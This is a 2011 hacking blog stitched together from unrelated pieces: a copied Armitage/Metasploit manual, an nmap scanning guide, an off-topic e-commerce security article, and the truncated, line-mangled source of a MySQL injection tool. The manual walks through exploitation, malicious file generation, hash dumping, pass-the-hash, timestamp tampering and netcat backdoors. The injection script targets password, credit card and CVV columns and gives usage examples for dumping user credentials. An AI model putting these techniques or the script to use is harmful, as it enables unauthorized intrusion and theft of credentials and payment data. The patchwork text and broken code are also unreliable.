Saturday, February 26, 2011

fast and easy hacking ARMITAGE

1.1 Cyber Attack Management

Armitage organizes Metasploit's capabilities around the hacking process. There are features for discovery, access, post-exploitation, and manuver. This section describes these features at a high-level, the rest of this manual covers these capabilities in detail.

For discovery, Armitage exposes several of Metasploit's host management features. You can import hosts and launch scans to populate a database of targets. Armitage also visualizes the database of targets--you'll always know which hosts you're working with and where you have sessions.

Armitage assists with remote exploitation--providing features to automatically recommend exploits and even run active checks so you know which exploits will work. If these options fail, you can use the Hail Mary approach and unleash Armitage's smarter db_autopwn against your target database.

For those of you who are hacking post-2003, Armitage exposes the client-side features of Metasploit. You can launch browser exploits, generate malicious files, and create Meterpreter executables.

Once you're in, Armitage provides several post-exploitation tools built on the capabilities of the Meterpreter agent. With the click of a menu you will escalate your privileges, dump password hashes to a local credentials database, browse the file system like you're local, and launch command shells.

Finally, Armitage aids the process of setting up pivots, a capability that lets you use compromised hosts as a platform for attacking other hosts and further investigating the target network. Armitage also exposes Metasploit's SOCKS proxy module which allows external tools to take advantage of these pivots. With these tools, you can further explore and maneuver through the network.

The rest of this manual is organized around this process, providing what you need to know in the order you'll need it.

1.2 Necessary Vocabulary

To use Armitage, it helps to understand Metasploit. Here are a few things you absolutely must know before continuing:

Metasploit is a console driven application. Anything you do in Armitage is translated into a command Metasploit understands. You can bypass Armitage and type commands yourself (covered later). If you're ever lost in a console, type help and hit enter.

Metasploit presents its capabilities as modules. Every scanner, exploit, and even payload is available as a module. If you're scanning a host, you use an auxiliary module. Before launching a module, you must set one or more variables to configure the module. The exploit process is similar. To launch an exploit, you must choose an exploit module, set one or more variables, and launch it. Armitage aims to make this process easier for you.

If you successfully exploit a host, you will have a session on that host. Armitage knows how to interact with shell and Windows meterpreter sessions.

Meterpreter is an advanced agent that makes a lot of post-exploitation functionality available to you. Armitage is built to take advantage of Meterpreter. Working with Meterpreter is covered later.

The Metasploit Unleashed course maintained by the Offensive Security folks is excellent. I recommend reading it before going further.

2.1 Getting Started: Linux

Metasploit has an RPC daemon that can accept local and remote connections. To start the Metasploit RPC daemon:

cd /pentest/exploits/framework3
./msfrpcd -f -U msf -P test -t Basic

This will start msfrpcd with the user msf, password test, SSL listener, on the default port 55553.

Optionally, you can use the Start MSF button to launch Metasploit for you. You'll still need to enter your database information. I recommend launching the Metasploit daemon separately though. If something happens to Armitage, you can reconnect to the Metasploit RPC daemon and all of your sessions and information will still be there.

If you have BackTrack R42, use the MySQL database. It's already configured. Start it with:

/etc/init.d/mysql start

Then use root as the username, toor as the password, as your host, and any name you choose as your database name.

You should not use the SQLite database with Armitage.

Once you have a database, navigate to the folder containing the Armitage files and type:


Make sure you check the Use SSL box when connecting.

2.2 Getting Started: Windows

To install Armitage on Windows (video):

  1. Download and Install the Metasploit Framework from
    • Get the package with all of the dependencies.
  2. Go to Start -> All Programs -> Metasploit Framework -> Metasploit Update
  3. Unzip the Armitage archive into the Metasploit install directory (e.g., c:\program files\rapid7\framework)
  4. Create a desktop shortcut to [metasploit folder]\armitage.bat and set the icon to [metasploit folder]\icons\armitage.ico

Unzipping the Armitage Windows archive over your framework install will add files that tell Armitage where to find Metasploit's database settings and how to start the RPC daemon. You only need to go through this process once. To update Armitage go to Start -> Programs -> Metasploit 3 -> msfupdate. If you see an error stating a conflict with any of the existing Armitage files, delete them, and update Metasploit again.

To use Armitage:

  • Double-click the shortcut. Click Start MSF and wait for a connection.

If something goes wrong, press Ctrl-Alt-Del and kill any ruby processes that you see.

2.4 Getting Started: MacOS X

Armitage works on MacOS X but it's not a supported platform for Armitage. Metasploit does not have an official package for OS X. There is a lot of manual setup involved getting the pre-requisites working.

I put a lot of energy into Armitage and supporting Windows takes a lot out of me as it is. I'm happy to fix MacOS X specific bugs in Armitage but I will not help you troubleshoot your Metasploit or database installation on MacOS X. I'm not withholding the secret from you--I do not use Metasploit on MacOS X and I have no idea how to help you.

Armitage on MacOS X works fine as a remote client to Metasploit. Download the Linux package, extract it, and double-click the armitage.jar file to get started.

3. User Interface Tour

3.1 Overview

The Armitage user interface has three main panels: modules, targets, and tabs. You may click the area between these panels to resize them to your liking.

3.2 Modules

The modules panel lets you launch a Metasploit auxiliary module, throw an exploit, generate a payload, and even run a post-exploitation script. Click through the tree to find the desired module. Double click the module to bring up a dialog with options.

Armitage will place highlighted hosts from the targets panel into the RHOSTS variable of any module launched from here.

You can search for modules too. Click in the search box below the tree, type a wildcard expression (e.g., ssh_*), and hit enter. The module tree will then show your search results, already expanded for quick viewing. Clear the search box and press enter to restore the module tree to its original state.

3.3 Targets - Graph View

The targets panel shows all hosts in the current workspace. Armitage represents each target as a computer with its IP address and other information about it below the computer. The computer screen shows the operating system the computer is running.

A red computer with electrical jolts indicates a compromised host. Right click the computer to use any sessions related to the host.

A directional green line indicates a pivot from one host to another. Pivoting allows Metasploit to route attacks and scans through intermediate hosts. A bright green line indicates the pivot communication path is in use.

Click a host to select it. You may select multiple hosts by clicking and dragging a box over the desired hosts. Where possible, Armitage will try to apply an action (e.g., launching an exploit) to all selected hosts.

Right click a host to bring up a menu with available options. The attached menu will show attack and login options, menus for existing sessions, and options to edit the host information.

The login menu is only available after a port scan reveals open ports that Metasploit can log in to. The Attack menu is only available after finding attacks through the Attacks menu bar. Shell and Meterpreter menus only show up when a shell or Meterpreter session exists on the selected host.

Several keyboard shortcuts are available in the targets panel. You may edit these in the Armitage -> Preferences menu.

* Ctrl Plus - zoom in
* Ctrl Minus - zoom out
* Ctrl 0 - reset the zoom level
* Ctrl A - select all hosts
* Escape - clear selection
* Ctrl C - arrange hosts into a circle
* Ctrl S - arrange hosts into a stack
* Ctrl H - arrange hosts into a hierarchy. This only works when a pivot is set up.
* Ctrl R - refresh hosts from the database
* Ctrl P - export hosts into an image

Right click the targets area with no selected hosts to configure the layout and zoom-level of the targets area.
3.4 Targets - Table View

If you have a lot of hosts, the graph view becomes difficult to work with. For this situation Armitage has a table view. Go to View -> Targets -> Table View to switch to this mode. Armitage will remember your preference.

Click any of the table headers to sort the hosts. Highlight a row and right-click it to bring up a menu with options for that host.

Armitage will bold the IP address of any host with sessions. If a pivot is in use, Armitage will make it bold as well.
3.5 Tabs

All functionality in Armitage is made available below the targets and module area. Each panel you open is presented in its own tab. This is where you will spend most of your time when working with Armitage. There are several panels.
3.6 Consoles

A console panel lets you interact with a command line interface through Armitage. The Metasploit console, Meterpreter console, and shell session interfaces all use a console panel.

The console panel features a command history. Use the up arrow to cycle through previously typed commands. The down arrow moves back to the last command you typed.

In the Metasploit console, use the Tab key to complete commands and parameters. This works just like the Metasploit console outside of Armitage.

Use Ctrl Plus to make the console font size larger, Ctrl Minus to make it smaller, and Ctrl 0 to reset it. This change is local to the current console only. Visit Armitage -> Preferences to permanently change the font.

Press Ctrl F to show a panel that will let you search for text within the console.

Use Ctrl A to select all text in the console's buffer.

Armitage sends a use or a set PAYLOAD command if you click a module or a payload name in a console.
4. Host Management
4.1 Workspaces

Use the Hosts menu to add hosts to Metasploit's database. Hosts added to Metasploit are kept in workspaces. A workspace is like a separate database. Workspaces allow you to organize hosts into groups and switch between them.

Use the Workspaces menu to create, switch, and remove workspaces.
4.2 Importing Hosts

To add host information to Metasploit, you can import it. Metasploit lets you import Nessus scans, NMap output, and more. The Hosts -> Import Hosts menu exposes this capability to you.

You may add hosts one IP address at a time through Hosts -> Add Hosts...
4.3 NMap Scans

You may also launch an NMap scan from Armitage and automatically import the results into Metasploit. The Hosts -> NMap Scan menu has several scanning options.

NMap's output is available in the window you launched Metasploit's RPC daemon from. If you launched Metasploit's RPC daemon from Armitage (the button), then go to View -> RPC Console to watch NMap's output.

Whether you import an NMap scan or launch it from Armitage, Armitage will update the hosts database with the operating system information provided by NMap.

NMap scans do not take advantage of pivots you have set up.

I recommend running your NMap scans externally and importing the results into Armitage. Some scans take a long time and Armitage is unable to give you a progress report for the scan. Use nmap [options] -oX whatever.xml to create a whatever.xml file for importing.
4.4 MSF Scans

Metasploit has many modules for scanning and fingerprinting hosts. These modules work quite well and result in accurate fingerprints when common services are available.

Armitage makes it easy to launch many of these at once through the Hosts -> MSF Scans menu item. Click this item, type in a range of IP addresses, and watch the magic happen.

Armitage uses all auxiliary modules that fingerprint a service. Type _version into the Module search box and hit enter to see a list of these modules.

You can watch the progress of an MSF Scan through View -> Jobs
5. Exploitation
5.1 Remote Exploits

Before you can attack, you must choose your weapon. Armitage makes this process easy. Use Attacks -> Find Attacks to generate a custom Attack menu for each host. This process uses Metasploit's db_autopwn feature to recommend the best exploits on a host by host basis. Use the by vulnerability option only if you've imported a vulnerability scan.

You can exploit a host by right-clicking it, selecting Attack, and choosing an exploit. To show the most appropriate attacks, make sure the operating system is set for the host. The Attack menu is limited to exploits with a rating of great or excellent.

Some useful exploits (e.g., lsass) are ranked good and they don't show in the attack menu. You can still launch them using the modules panel. Highlight the host (or hosts) that you want to exploit and navigate to the desired exploit in the modules panel. Double click the exploit and you will see the launch dialog.

Under Armitage -> Preferences there is an option to change the minimal exploit ranking. Try good or normal if you want more exploits in the Attack menu.
5.2 Which exploit?

Learning which exploits to use and when comes with experience. Some exploits in Metasploit implement a check function. These check functions connect to a host and check if the exploit applies. Armitage can use these check functions to help you choose the right exploit when there are many options. For example, targets listening on port 80 will show several web application exploits after you use Find Attacks. Click the Check exploits... menu to run the check command against each of these. Once all the checks are complete, press Ctrl F and search for vulnerable. This will lead you to the right exploit.

Clicking a host and selecting Services is another way to find an exploit. If you have NMap scan results, look at the information field and guess which server software is in use. Use the modules panel to search for any Metasploit modules related to that software. One module may help you find information required by another exploit. Apache Tomcat is an example of this. The tomcat_mgr_login module will search for a username and password that you can use. Once you have this, you can launch the tomcat_mgr_deploy exploit to get a shell on the host.

If all this fails, you have the hail mary option. Attacks -> Hail Mary launches this feature. Armitage's hail mary option is a smarter db_autopwn. It first finds exploits relevant to your target set. It then filters these exploits using known information about the targets. For example, Hail Mary won't launch a Linux exploit against a Windows target. These exploits are then sorted so the best ones are launched first. Once this preparation is complete, Armitage launches these exploits against your targets. This feature won't give you every possible shell, but it's a good option if you don't know what else to do.

5.3 Launching Exploits

Armitage uses this dialog to launch exploits:

The exploit launch dialog lets you configure variables for a module and choose whether to use a reverse connect payload.

Variables are presented in a table. Double click a value to edit it. If a variable requires a filename, double click the variable name to bring up a file chooser dialog. You may also view and set advanced options by checking Show advanced options.

Armitage chooses a payload for you. Windows exploits will use a Meterpreter payload. UNIX exploits will launch a command shell.

Click Launch to launch the exploit. If the exploit is successful, the host's computer will change color in the targets panel. Metasploit will also print a message to any open consoles.

5.4 Client-side Exploits

Armitage makes it easy to configure client-side exploits available with Metasploit. The Attacks menu has options to set up browser attacks, email client attacks, and even generate malicious files.

Attacks set up in this way are pre-configured to connect back to your current Metasploit instance. The exploit handler is already configured for you.

Browser Autopwn creates a URL that uses JavaScript to fingerprint anyone who connects and launches an appropriate browser exploit against them.

File Autopwn sets up a URL serving many malicious files, generated for your viewing pleasure. Visit the URL, download a file, and send it to your target. Or get them to download it directly.

Hosts compromised via client-side exploits will show up in the targets panel when they connect back. Armitage does not need to know about these hosts beforehand.

5.5 Generate a Payload

Exploits are great, but don't ignore the simple stuff. If you can get a target to run a program, then all you need is an executable. Armitage can help you generate an executable from any of Metasploit's payloads. Choose a payload in the modules panel, double click it, select the type of output, and set your options. Once you click launch, a save dialog will ask you where to save the file to.

Generate a Metasploit Payload

When you generate a payload, you're responsible for setting up a listener to interact with it. Select the multi/handler output type in the payload dialog to set up a handler for the payload with your desired options.

For Meterpreter and shell payloads, you may also go to Armitage -> Listeners and choose a bind listener to connect to a listening payload or a reverse listener to wait for a payload to connect.

6. Post Exploitation

6.1 Managing Sessions

Armitage makes it easy to manage the Windows Meterpreter agent once you successfully exploit a host. Hosts running the Meterpreter payload will have a Meterpreter N menu for each Meterpreter session.

Meterpreter Post Exploitation Options

If you have shell access to a host, you will see a Shell N menu for each shell session. Right click the host to access this menu. If you have a Windows shell session, you may go to Shell N -> Meterpreter... to upgrade the session to a Meterpreter session. If you have a UNIX shell, go to Shell N -> Upload to upload a file using the UNIX printf command.

6.2 Access

Once you exploit a host, duplicating your access should be a first priority. Meterpreter N -> Access -> Duplicate will generate a meterpreter executable, upload, and run it on the host for you. If you lose the original session, this will give you a fall back.

Some exploits result in administrative access to the host. Other times, you need to escalate privileges yourself. To do this, use the Meterpreter N -> Access -> Escalate Privileges option to try several Windows privilege escalation options.

6.3 File Browser

Meterpreter gives you several options for exploring a host once you've exploited it. One of them is the file browser. This tool will let you upload, download, and delete files.

Right-click a file to download or delete it. If you want to delete a directory, make sure it's empty first.

If you have system privileges, you may modify the file timestamps using the File Browser. Right-click a file or directory and go to the Timestomp menu. This features works like a clipboard. Use Get MACE Values to capture the timestamps of the current file. Right-click another file and use Set MACE Values to update the timestamps of that file.

Go to Meterpreter N -> Explore -> Browse Files to access the File Browser.

6.4 Command Shell

You can reach a command shell for a host through Meterpreter N -> Interact -> Command Shell. The Meterpreter shell is also available under the same parent menu.

Navigating to the Meterpreter N menu for each action gets old fast. Right-click inside the Meterpreter shell window to see the Meterpreter N menu items right away.

Close the command shell tab to kill the process associated with the command shell.

6.5 Post-exploitation Modules

Metasploit has several post-exploitation modules too. Navigate the post branch in the module browser. Double-click a module and Armitage will show a launch dialog. Armitage will populate the module's SESSION variable if a compromised host is highlighted. Each post-exploitation module will execute in its own tab and present its output to you there.

7. Maneuvering

7.1 Pivoting

Metasploit can launch attacks from a compromised host and receive sessions on the same host. This ability is called pivoting.

To create a pivot, go to Meterpreter N -> Pivoting -> Setup.... A dialog will ask you to choose which subnet you want to pivot through the session.

Once you've set up pivoting, Armitage will draw a green line from the pivot host to all targets reachable by the pivot you created. The line will become bright green when the pivot is in use.

To use a pivot host for a reverse connection, set the LHOST variable in the exploit launch dialog to the IP address of the pivot host.

7.2 Scanning and Browsing

Once you've owned a host, it's good to explore and see what else is on the same network. If you've set up pivoting, Metasploit will tunnel TCP connections to eligible hosts through the pivot host. These connections must come from Metasploit though.

Use the MSF Scans (Hosts -> MSF Scans) to launch scans that will honor the pivots you've setup.

You may also set up a SOCKS proxy to let other tools take advantage of the pivots you've setup. Go to Armitage -> SOCKS Proxy... to launch the SOCKS proxy server.

7.3 Pass-the-Hash

When you login to a Windows host, your password is hashed and compared to a stored hash of your password. If they match, you're in. When you attempt to access a resource on the same Windows domain, the stored hash is sent to the other host and used to authenticate you. With access to these hashes, you can use this mechanism to take over other hosts on the same domain. This is called a pass-the-hash attack.

To collect hashes, visit Meterpreter N -> Access -> Dump Hashes. You need administrative privileges to do this. Armitage will store the collected hashes in a database for your use later.

You may view collected hashes through View -> Credentials. For your cracking pleasure, the Export button in this tab will export credentials in pwdump format.

To install Meterpreter on another Windows host, right-click the host and go to Attack -> smb -> Pass the Hash.... This will present a dialog where you can select which hash to login with.

Your hosts must be on the same active directory domain for this attack to work.

7.4 Netcat Listeners

A popular technique for creating a quick backdoor is to use netcat to launch a command shell on connection. Netcat can either listen for a connection or connect back to you.

Armitage can take advantage of these sessions. Go to Armitage -> Listeners and choose bind to connect to a listening netcat session. Choose reverse to wait for netcat to connect back to you. This is one way to receive a shell from a friend who has already compromised a host.

7.5 Password Brute Force

Metasploit can attempt to guess a username and password for a service for you. This capability is easy to use through the modules panel.

Metasploit supports brute forcing through the auxiliary modules named service_login. Type login in the modules panel to search for them.

To brute force a username and password over SSH, browse to auxiliary/scanner/ssh/ssh_login in the modules panel and double click it.

If you know the username, set the USERNAME variable. If you'd like Metasploit to brute force the username, select a value for USER_FILE. Double click the USER_FILE variable to bring up a file chooser where you can select a text file containing a list of usernames.

Metasploit has many files related to brute forcing in the [metasploit install]/data/wordlists directory.

Set the PASS_FILE variable to a text file containing a list of passwords to try.

If you're only brute forcing one host and you have a lot of usernames/passwords to try, I recommend using an external tool like Hydra. Metasploit does not make several parallel connections to a single host to speed up the process. This lesson can be taken one step further--use the right tool for each job.

8. Remote Metasploit

8.1 Remote Connections

You can use Armitage to connect to an existing Metasploit instance on another host. Working with a remote Metasploit instance is similar to working with a local instance. Some Armitage features require read and write access to local files to work. Armitage removes or degrades these features when managing a naked remote Metasploit instance.

Simply specify the remote IP address, remote port, RPC username, and RPC passowrd in Armitage's starting dialog and click Connect. You do not need to specify database settings if the database is already configured in the running Metasploit instance.

Do not connect multiple clients to Metasploit unless you use Armitage's network attack server feature.

8.2 Launching the RPC Server from the Metasploit Console

Armitage connects to Metasploit's RPC server. You can launch Metasploit's RPC server as described in the Getting Started: Linux section. It's also possible to connect Armitage to a running Metasploit console.

In the Metsploit console, type:

load xmlrpc

Optionally, you can specify the host and port to bind to with:

load xmlrpc ServerHost=address ServerPort=port

Take note of the RPC username and password. You will need these when you launch Armitage.

Launch Metasploit RPC on Windows

Once the RPC server is loaded you can connect Armitage to it. Make sure Use SSL is not checked.

This process works on Windows and Linux.

When emulating a social engineering attack or using client-side exploits, it's helpful to set up Metasploit on a remote server to receive sessions. I configure my listeners through Metasploit's console and connect with Armitage to manage the post-exploitation process.

8.3 Multi-Player Metasploit

Use Armitage's network attack server mode to collaborate using Metasploit. First, you must start a Metasploit RPC instance. Then, on the same system, run Armitage's network attack server software:

java -jar armitage.jar --server host port user password ssl?


./armitage --server host port user password ssl?

Armitage's network attack server will connect to Metasploit on the specified port with the username and password you provide. Use 1 for ssl? if you'd like Armitage to connect to Metasploit using SSL. Leave this value empty otherwise. For the host value, specify the IP address remote Armitage users will use to connect to your Metasploit instance.

Make sure you specify the remote IP address of the host and not Armitage's network attack server sets a Metasploit global variable to tell clients how to connect to it.

This server adds extra features to Armitage clients connecting to Metasploit remotely. Most of the features degraded during a remote connection are now present.

Multiple users can now connect to one Metasploit instance and collaborate with each other. Host information, scan data, and sessions are shared using Metasploit's database.

Metasploit Team Support in Armitage

View -> Event Log lets you communicate with users connected to the same Metasploit instance.

Multiple users can now use any Meterpreter session at the same time. Each user can open one or more command shells, browse files, and take screenshots of the compromised host.

Metasploit shell sessions are automatically locked and unlocked when in use. If a user is interacting with a shell, Armitage will warn you that it's in use.

The file browser download feature will still download to the remote server. Use a persistent sftp connection to files downloaded through Meterpreter. The file browser upload feature will upload your file to the Metasploit system first and then upload it to the target host.

Penetration testers will find this feature invaluable. Imagine you're working on a pen test and come across a system you don't know much about. You can reach back to your company and ask your local expert to load Armitage and connect to the same Metasploit instance. They will immediately have access to your scan data and they can interact with your existing sessions... seamlessly.

Or, imagine that you're simulating a phishing attack and you get access to a host. Your whole team can now work on the same host. One person can search for data, another can set up a pivot and search for internal hosts to attack, and another can work on persistence. The sky is the limit here.

Thursday, February 24, 2011


List of my Security Software:
top 10 hacking tools
net stumbler for wireless
ubuntu lite

try this and enjoyed..!!



nmap is the network mapper tool. nmap can be used to scan your IP addresses (or anyone else's IP addresses for that matter) for open ports. It is important to note that nmap, only scans for open TCP/UDP type ports.

See the nmap man page

nmap runs on Unix and Windows. The windows version uses either the GUI or the command line version. Operation of nmap on both systems is substantially the same.

See the nmap fingerprinting documentation. This information comes with nmap.

Running nmap for OS enumeration
You can use nmap to detect which operating system is on the other end by using what is called active stack fingerprinting. nmap keeps a database that you can update that helps in enumerating what the OS of a remote host is. See the following phrack magazine article explaining active stack fingerprinting.
Here is another article from insecure.orgthat a student found. It gives a very good explanation of how to get through a firewall using nmap to figure out about hosts on the inside.
Using the following Command line:
nmap -O [remote host]
nmap performs the following:

  • host is sent packets of different types on numerous well known ports
  • FIN Probe a FIN packet is sent to an open port. RFC 793 says that port should not respond, NT does.
  • Bad Flag Probe. an undefined TCP flag is sent in a TCP packet header of a SYN packet, Some OS'es like Linux will respond
  • Initial Sequence Number sampling. Different TCP stacks start their ISN with different numbers.
  • Don't Fragment bit monitoring some OS'es set don't fragment bit to yes.
  • TCP Initial window size Different TCP stacks set the window size differently.
  • ACK value Some stacks send back the ACK value you sent, some increment it.
  • ICMP error quenching RFC 1812 limits the rate at which error messages are sent. nmap floods a high-numbered UDP port and counts the error rate.
  • ICMP message quoting OS'es differ in the data sent back with errors.
  • ICMP error message-echoing integrity stacks differ in how they write to the headers when sending error messages.
  • TOS type of service different stacks place different values in the TOS ICMP port unreachable field.
  • TCP Options Different TCP header options are sent to host, handling of these allows some enumeration of OS.

Other nmap commands:

  • nmap -p80 -this detects if port is open
  • nmap -sP -PT80 -this performs a TCP ping scan
  • nmap -sS -sU -p 1-65535 -scan all ports UDP and TCP SYN on 255 hosts
  • etc.
    Other options
  • -sT TCP Connect scan: has a 3 way handshake with host
  • -sS SYN scanning or half open scanning RST/ACK means not listening SYN/ACK means port is listening (best scan to use)
  • -P0 (That is a Capital Pzero) don't ping before scanning (important, since many firewalls block ping and nmap will abort scan if host is not pingable)
  • -sF Send a FIN packet, see if it answers, RFC 793 states that system should send back a RST for all closed ports.
  • -sX christmastree scan,
  • -sN like a FIN packet scan all closed ports should send a RST packet.
  • -sU if a ICMP port unreachable packet is not received back, we can assume that the host is listening on that port, UDP.
download for nmap:
nmap for linux
nmap for windows



List Of My Source



Security Software

Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets, recommends exploits, and exposes the advanced capabilities of the framework. Armitage aims to make Metasploit usable for security practitioners who understand hacking but don’t use Metasploit every day. If you want to learn Metasploit and grow into the advanced features, Armitage can help us.

Prerequisites to install Armitage:

Armitage has the following prerequisites:

  • Java 1.6.0+
  • Metasploit 3.5+
  • A database and the information to connect to it


./msfrpcd -f -U msf -P test -t Basic

Once you have a database, navigate to the folder containing the Armitage files and type:


Customization options:
You may edit these in the Armitage -> Preferences menu.
- Ctrl Plus – zoom in
- Ctrl Minus – zoom out
- Ctrl 0 – reset the zoom level
- Ctrl A – select all hosts
- Escape – clear selection
- Ctrl C – arrange hosts into a circle
- Ctrl S – arrange hosts into a stack
- Ctrl H – arrange hosts into a hierarchy. This only works when a pivot is set up.
- Ctrl R – refresh hosts from the database

Download Armitage v11.25.10: for windows

amitage.tgz for linux

Drawing the Line

You need to draw the line between being safe and exaggerating. Online frauds happen, but you shouldn’t put your website under lockdown just because someone might make a purchase using a stolen credit card. Security features are necessary and your visitors should see a few logos that attest to the fact that your website is safe to use, but don’t add more measures that necessary. As long as you know when to stop and you don’t make your visitors feel uncomfortable, your sales will increase gradually and no one will drop their order because of your security features.

Security Warnings

The worst feature that can be implemented in an eCommerce store is the pop up security warning. Most people who are navigating the internet are not very familiar with how online payments work and they are very skeptical when it comes to giving out their credit card information. If a security warning appears on the screen, there are high chances that they will simply get scared and avoid making the purchase altogether. You shouldn’t give your customers the chance to panic: just implement the necessary features and make sure that your website is secure when it comes to online payments.

Decreasing Sales with Security Features

If people reach the checkout page and they need to jump through hoops before you give them the chance to place their order, they will most likely leave your store and increase your shopping card abandonment rate. A good example is adding a Captcha code next to the registration form. Users don’t like deciphering these codes and you need to find another way to deter spammers. Some of today’s Captcha codes are quite complicated and there is no reason to add them to an online store.

Necessary Security Measures

Adding security features to an eCommerce website is not only recommended, it is also necessary. You need to make sure that your customers can give out their credit card information and that it won’t fall into the wrong hands. But how do these safety features affect your sales? Are people more likely to make purchases on websites with many security add-ons or on websites that aren’t focused on credit card security? The answer is somewhere in between.

Necessary Security Measures

SSL certificates are viewed as the standard in eCommerce and running a large online business is almost impossible without this security feature. Most people feel comfortable entering their credit card information once they see the SSL logo and there is no doubt that such a feature will be beneficial. Other merchants offer similar tools for security, but the point is always the same: the transfer of information is encrypted and you can be sure that your credit card information will be kept secret.

schemafuzz source

# MySQL Injection Schema, Dataext, and fuzzer

# based on work done by d3hydr8 from -
# respect where respect is due

# Share the c0de!

# pangeran90 Team
# rsauron[at]gmail[dot]com

# Greetz to
# d3hydr8, P47r1ck, Tarsian, c0mr@d, reverenddigitalx

# Proxy function may be a little buggy if your using public proxies... Test your proxy prior to using it with this script..
# The script does do a little proxy test.. it does a GET to if data comes back its good... no data = failed and the proxy
# will not be used. This is a effort to keep the script from getting stuck in a endless loop.
# If the fuzzing part starts returning results for every column and table... that usually means the error is not defined in the ERRORS
# variable. Manually visit the page get the error and add it to the variable.. I am not going to explain this.
# Any other questions Hit the forums and ask questions. google is your friend!

# This was written for educational purpose only. Use it at your own risk.
# Author will be not responsible for any damage!
# Intended for authorized Web Application Pen Testing!


#Fill in the error or errors your receiving here.
TABLE_ERRORS = ["Warning: mysql_fetch_row()","You have an error in your SQL syntax","doesn't exist","Unknown column","Access denied"]
COLUMN_ERRORS = ["Warning: mysql_fetch_row()","You have an error in your SQL syntax","doesn't exist","Unknown column","Access denied"]

#Fill in the tables you want tested here.
fuzz_tables = ["orders","user","users","username","usernames","mysql.user","member","members","admin","administrator","administrators","login","logins","logon","jos_users","jos_contact_details","userrights","superuser","control","usercontrol","author","autore","artikel","newsletter","tb_user","tb_users","tb_username","tb_usernames","tb_admin","tb_administrator","tb_member","tb_members","tb_login","perdorues","korisnici","webadmin","webadmins","webuser","webusers","webmaster","webmasters","customer","customers","sysuser","sysusers","sysadmin","sysadmins","memberlist","tbluser","tbl_user","tbl_users","a_admin","x_admin","m_admin","adminuser","admin_user","adm","userinfo","user_info","admin_userinfo","userlist","user_list","user_admin","order","user_login","admin_user","admin_login","login_user","login_users","login_admin","login_admins","sitelogin","site_login","sitelogins","site_logins","SiteLogin","Site_Login","User","Users","Admin","Admins","Login","Logins","adminrights","news","perdoruesit"]
#Fill in the columns you want tested here.
fuzz_columns = ["user","username","password","passwd","pass","cc_number","id","email","emri","fjalekalimi","pwd","user_name","customers_email_address","customers_password","user_password","name","user_pass","admin_user","admin_password","user_pass","admin_pass","usern","user_n","users","login","logins","login_user","login_admin","login_username","user_username","user_login","auid","apwd","adminid","admin_id","adminuser","admin_user","adminuserid","admin_userid","adminusername","admin_username","adminname","admin_name","usr","usr_n","usrname","usr_name","usrpass","usr_pass","usrnam","nc","uid","userid","user_id","myusername","mail","emni","logohu","punonjes","kpro_user","wp_users","emniplote","perdoruesi","perdorimi","punetoret","logini","llogaria","fjalekalimin","kodi","emer","ime","korisnik","korisnici","user1","administrator","administrator_name","mem_login","login_password","login_pass","login_passwd","login_pwd","sifra","lozinka","psw","pass1word","pass_word","passw","pass_w","user_passwd","userpass","userpassword","userpwd","user_pwd","useradmin","user_admin","mypassword","passwrd","admin_pwd","admin_pass","admin_passwd","mem_password","memlogin","userid","admin_id","adminid","e_mail","usrn","u_name","uname","mempassword","mem_pass","mem_passwd","mem_pwd","p_word","pword","p_assword","myusername","myname","my_username","my_name","my_password","my_email","cvvnumber"]

import urllib, sys, re, os, socket, httplib, urllib2, time

#determine platform
if sys.platform == 'linux-i386' or sys.platform == 'linux2' or sys.platform == 'darwin':
SysCls = 'clear'
elif sys.platform == 'win32' or sys.platform == 'dos' or sys.platform[0:5] == 'ms-dos':
SysCls = 'cls'
SysCls = 'unknown'

#say hello
if len(sys.argv) <= 1: print "\n|---------------------------------------------------------------|" print "| rsauron[@]gmail[dot]com v3.5 |" print "| 6/2008 |" print "| -MySQL v5+ Information_schema Database Enumeration |" print "| -MySQL v4+ Data Extractor |" print "| -MySQL v4+ Table & Column Fuzzer |" print "| Usage: [options] |" print "| -h help |" print "|---------------------------------------------------------------|\n" sys.exit(1) #help option for arg in sys.argv: if arg == "-h": print " Usage: ./ [options] rsauron[@]gmail[dot]com" print "\tModes:" print "\tDefine: --dbs Shows all databases user has access too. MySQL v5+" print "\tDefine: --schema Enumerate Information_schema Database. MySQL v5+" print "\tDefine: --dump Extract information from a Database, Table and Column. MySQL v4+" print "\tDefine: --fuzz Fuzz Tables and Columns. MySQL v4+" print "\tDefine: --info Gets MySQL server configuration only. MySQL v4+" print "\n\tRequired:" print "\tDefine: -u URL \",pangeran90,3,4\"" print "\n\tMode dump and schema options:" print "\tDefine: -D \"database_name\"" print "\tDefine: -T \"table_name\"" print "\tDefine: -C \"column_name,column_name...\"" print "\n\tOptional:" print "\tDefine: -p \" or proxy.txt\"" print "\tDefine: -o \"ouput_file_name.txt\" Default is schemafuzzlog.txt" print "\tDefine: -end \"/*\" or \"--\" Default is \"/*\"" print "\n Ex: ./ --info -u \",pangeran90,3,4\"" print " Ex: ./ --dbs -u \",pangeran90,3,4\"" print " Ex: ./ --schema -u \",pangeran90,3,4\" -D catalog -T orders" print " Ex: ./ --dump -u \",pangeran90,3,4\" -D joomla -T jos_users -C username,password" print " Ex: ./ --fuzz -u \",pangeran90,3,4\" -end \"--\" -o sitelog.txt" sys.exit(1) #define varablies site = "" dbt = "schemafuzzlog.txt" proxy = "None" count = 0 arg_table = "None" arg_database = "None" arg_columns = "None" arg_end = "/*" arg_row = "Rows" pangeran90 = "concat(0x1e,0x1e," mode = "None" line_URL = "" count_URL = "" gets = 0 cur_db = "" cur_table = "" table_num = 0 terminal = "" num = 0 #Check args for arg in sys.argv: if arg == "-u": site = sys.argv[count+1] elif arg == "-o": dbt = sys.argv[count+1] elif arg == "-p": proxy = sys.argv[count+1] elif arg == "--dump": mode = arg arg_dump = sys.argv[count] elif arg == "--schema": mode = arg arg_schema = sys.argv[count] elif arg == "--dbs": mode = arg arg_dbs = sys.argv[count] elif arg == "--fuzz": mode = arg arg_fuzz = sys.argv[count] elif arg == "--info": mode = arg arg_info = sys.argv[count] elif arg == "-D": arg_database = sys.argv[count+1] elif arg == "-T": arg_table = sys.argv[count+1] elif arg == "-C": arg_columns = sys.argv[count+1] elif arg == "-end": arg_end = sys.argv[count+1] count+=1 #Title write file = open(dbt, "a") print "\n|---------------------------------------------------------------|" print "| rsauron[@]gmail[dot]com v3.5 |" print "| 6/2008 |" print "| -MySQL v5+ Information_schema Database Enumeration |" print "| -MySQL v4+ Data Extractor |" print "| -MySQL v4+ Table & Column Fuzzer |" print "| Usage: [options] |" print "| -h help |" print "|---------------------------------------------------------------|" file.write("\n|---------------------------------------------------------------|") 